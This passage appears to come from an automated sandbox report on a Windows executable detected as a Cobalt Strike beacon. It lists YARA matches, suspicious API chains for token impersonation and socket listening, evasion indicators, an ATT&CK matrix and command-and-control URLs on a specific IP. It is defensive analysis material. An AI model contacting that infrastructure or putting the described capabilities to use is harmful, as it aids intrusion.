            Source: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
            Source: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
            Source: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
            Source: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
            Source: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
            Source: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
            Source: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
            Source: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
            Source: Process Memory Space: JP1KbvjWcM.exe PID: 7324, type: MEMORYSTRMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
            Source: Process Memory Space: JP1KbvjWcM.exe PID: 7324, type: MEMORYSTRMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
            Source: Process Memory Space: JP1KbvjWcM.exe PID: 7324, type: MEMORYSTRMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: classification engineClassification label: mal100.troj.evad.winEXE@1/3@1/1
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01B0B70 LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,0_2_00000265B01B0B70
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01B867C TerminateProcess,GetLastError,GetCurrentProcess,CreateToolhelp32Snapshot,Process32First,ProcessIdToSessionId,Process32Next,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,htonl,htonl,GetLastError,OpenProcessToken,GetLastError,ImpersonateLoggedOnUser,GetLastError,DuplicateTokenEx,GetLastError,ImpersonateLoggedOnUser,GetLastError,0_2_00000265B01B867C
            Source: JP1KbvjWcM.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: JP1KbvjWcM.exeReversingLabs: Detection: 68%
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeSection loaded: cryptnet.dllJump to behavior
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeSection loaded: cabinet.dllJump to behavior
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
            Source: JP1KbvjWcM.exeStatic PE information: Image base 0x140000000 > 0x60000000
            Source: JP1KbvjWcM.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01C9744 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00000265B01C9744
            Source: JP1KbvjWcM.exeStatic PE information: section name: .xdata
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01D916C push 0000006Ah; retf 0_2_00000265B01D9184
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B022098B push eax; ret 0_2_00000265B0220BE7
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B0220B5E push eax; ret 0_2_00000265B0220BE7
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B206B19F push ebp; iretd 0_2_00000265B206B1A0
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B20697A4 push edi; iretd 0_2_00000265B20697A5
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B208AC96 push ebp; iretd 0_2_00000265B208AC97
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B208ACB6 push ebp; iretd 0_2_00000265B208ACB7
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B208ACDF push ebp; iretd 0_2_00000265B208ACE0
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B206FD48 push ebx; iretd 0_2_00000265B206FD49
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B206BD63 pushad ; retf 0_2_00000265B206BD64
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B2069B65 push cs; retf 0_2_00000265B2069B66
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01C01A8 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00000265B01C01A8
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01B58540_2_00000265B01B5854
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01AFA1C0_2_00000265B01AFA1C
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-35573
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-35437
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeAPI coverage: 6.4 %
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01AFA1C0_2_00000265B01AFA1C
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exe TID: 7340Thread sleep count: 66 > 30Jump to behavior
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exe TID: 7340Thread sleep time: -3960000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01B9220 malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose,0_2_00000265B01B9220
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01B1C30 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,0_2_00000265B01B1C30
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeThread delayed: delay time: 60000Jump to behavior
            Source: JP1KbvjWcM.exe, 00000000.00000002.2911305733.00000265AFF43000.00000004.00000020.00020000.00000000.sdmp, JP1KbvjWcM.exe, 00000000.00000002.2911305733.00000265AFECC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: JP1KbvjWcM.exe, 00000000.00000002.2911305733.00000265AFF43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeAPI call chain: ExitProcess graph end nodegraph_0-35504
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01C9744 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00000265B01C9744
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01C9744 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00000265B01C9744
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01C9744 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00000265B01C9744
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01B76F0 InitializeProcThreadAttributeList,GetProcessHeap,HeapAlloc,InitializeProcThreadAttributeList,0_2_00000265B01B76F0
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01D24E0 RtlVirtualUnwind,SetUnhandledExceptionFilter,0_2_00000265B01D24E0
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00007FF65B3B1180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,0_2_00007FF65B3B1180
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00007FF65B3BD2D0 SetUnhandledExceptionFilter,malloc,0_2_00007FF65B3BD2D0

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: Yara matchFile source: Process Memory Space: JP1KbvjWcM.exe PID: 7324, type: MEMORYSTR
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01BDF50 LogonUserA,GetLastError,ImpersonateLoggedOnUser,GetLastError,0_2_00000265B01BDF50
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01BDEC8 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00000265B01BDEC8
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01B0920 CreateNamedPipeA,0_2_00000265B01B0920
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01D22A0 ReadFile,GetLocalTime,0_2_00000265B01D22A0
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01B5E28 GetUserNameA,GetComputerNameA,GetModuleFileNameA,strrchr,GetVersionExA,GetProcAddress,GetModuleHandleA,GetProcAddress,_snprintf,0_2_00000265B01B5E28
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01B5E28 GetUserNameA,GetComputerNameA,GetModuleFileNameA,strrchr,GetVersionExA,GetProcAddress,GetModuleHandleA,GetProcAddress,_snprintf,0_2_00000265B01B5E28

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: Process Memory Space: JP1KbvjWcM.exe PID: 7324, type: MEMORYSTR
            Source: Yara matchFile source: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0.2.JP1KbvjWcM.exe.265b01a0000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.JP1KbvjWcM.exe.265b01a0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.2911695185.00000265B0220000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2911695185.00000265B0220000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01D2630 bind,0_2_00000265B01D2630
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01B6670 htonl,htons,socket,closesocket,bind,ioctlsocket,0_2_00000265B01B6670
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01BEE8C socket,closesocket,htons,bind,listen,0_2_00000265B01BEE8C
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01B6A78 socket,htons,ioctlsocket,closesocket,bind,listen,0_2_00000265B01B6A78
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts
            2
            Native API
            2
            Valid Accounts
            2
            Valid Accounts
            2
            Valid Accounts
            OS Credential Dumping1
            System Time Discovery
            Remote Services1
            Archive Collected Data
            2
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            DLL Side-Loading
            21
            Access Token Manipulation
            11
            Virtualization/Sandbox Evasion
            LSASS Memory1
            Query Registry
            Remote Desktop ProtocolData from Removable Media1
            Non-Standard Port
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            Process Injection
            21
            Access Token Manipulation
            Security Account Manager141
            Security Software Discovery
            SMB/Windows Admin SharesData from Network Shared Drive1
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            DLL Side-Loading
            1
            Process Injection
            NTDS11
            Virtualization/Sandbox Evasion
            Distributed Component Object ModelInput Capture1
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Obfuscated Files or Information
            LSA Secrets1
            Process Discovery
            SSHKeylogging11
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading
            Cached Domain Credentials1
            Account Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
            System Owner/User Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
            File and Directory Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow3
            System Information Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            JP1KbvjWcM.exe68%ReversingLabsWin64.Trojan.CobaltStrike
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://103.19.190.184:4436/match90%Avira URL Cloudsafe
            https://103.19.190.184:4436/0%Avira URL Cloudsafe
            https://103.19.190.184:4436/matchP0%Avira URL Cloudsafe
            https://103.19.190.184:4436/matchm0%Avira URL Cloudsafe
            https://103.19.190.184:4436/Ld3zc0%Avira URL Cloudsafe
            http://103.19.190.184/Ld3z0%Avira URL Cloudsafe
            https://103.19.190.184:4436/matchT0%Avira URL Cloudsafe
            https://103.19.190.184:4436/match70%Avira URL Cloudsafe
            https://103.19.190.184:4436/match320%Avira URL Cloudsafe
            https://103.19.190.184/0%Avira URL Cloudsafe
            http://127.0.0.1:%u/0%Avira URL Cloudsafe
            https://103.19.190.184:4436/Ld3z0%Avira URL Cloudsafe
            http://03.19.190.184:4436/Ld3z0%Avira URL Cloudsafe
            https://103.19.190.184:4436/match060%Avira URL Cloudsafe
            https://103.19.190.184:4436/match%0%Avira URL Cloudsafe
            https://103.19.190.184:4436/l0%Avira URL Cloudsafe
            https://103.19.190.184:4436/matche0%Avira URL Cloudsafe
            https://103.19.190.184/80%Avira URL Cloudsafe
            https://103.19.190.184:4436/match0%Avira URL Cloudsafe
            https://103.19.190.184:4436/matchC0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            bg.microsoft.map.fastly.net
            199.232.210.172
            truefalse
              high
              212.20.149.52.in-addr.arpa
              unknown
              unknownfalse
                high
                NameMaliciousAntivirus DetectionReputation
                http://103.19.190.184/Ld3ztrue
                • Avira URL Cloud: safe
                unknown
                http://03.19.190.184:4436/Ld3ztrue
                • Avira URL Cloud: safe
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                https://103.19.190.184:4436/matchmJP1KbvjWcM.exe, 00000000.00000003.1967322736.00000265AFFA0000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://103.19.190.184:4436/JP1KbvjWcM.exe, 00000000.00000003.2779450745.00000265AFF87000.00000004.00000020.00020000.00000000.sdmp, JP1KbvjWcM.exe, 00000000.00000002.2911305733.00000265AFF87000.00000004.00000020.00020000.00000000.sdmp, JP1KbvjWcM.exe, 00000000.00000002.2911305733.00000265AFF51000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://103.19.190.184:4436/matchPJP1KbvjWcM.exe, 00000000.00000002.2911305733.00000265AFF80000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://103.19.190.184:4436/matchTJP1KbvjWcM.exe, 00000000.00000002.2911305733.00000265AFFA0000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://103.19.190.184:4436/Ld3zcJP1KbvjWcM.exe, 00000000.00000002.2911305733.00000265AFF26000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://103.19.190.184:4436/match7JP1KbvjWcM.exe, 00000000.00000003.1839792896.00000265AFF86000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://103.19.190.184:4436/match32JP1KbvjWcM.exe, 00000000.00000002.2911305733.00000265AFF87000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://103.19.190.184:4436/match9JP1KbvjWcM.exe, 00000000.00000002.2911305733.00000265AFFA0000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://103.19.190.184/JP1KbvjWcM.exe, 00000000.00000002.2911305733.00000265AFECC000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://103.19.190.184/8JP1KbvjWcM.exe, 00000000.00000002.2911305733.00000265AFECC000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://103.19.190.184:4436/Ld3zJP1KbvjWcM.exe, 00000000.00000002.2911305733.00000265AFF26000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://103.19.190.184:4436/match06JP1KbvjWcM.exe, 00000000.00000003.1967322736.00000265AFFA0000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://127.0.0.1:%u/JP1KbvjWcM.exe, 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://103.19.190.184:4436/lJP1KbvjWcM.exe, 00000000.00000003.2779450745.00000265AFF87000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://103.19.190.184:4436/matchCJP1KbvjWcM.exe, 00000000.00000003.2779558871.00000265AFFA0000.00000004.00000020.00020000.00000000.sdmpfalse
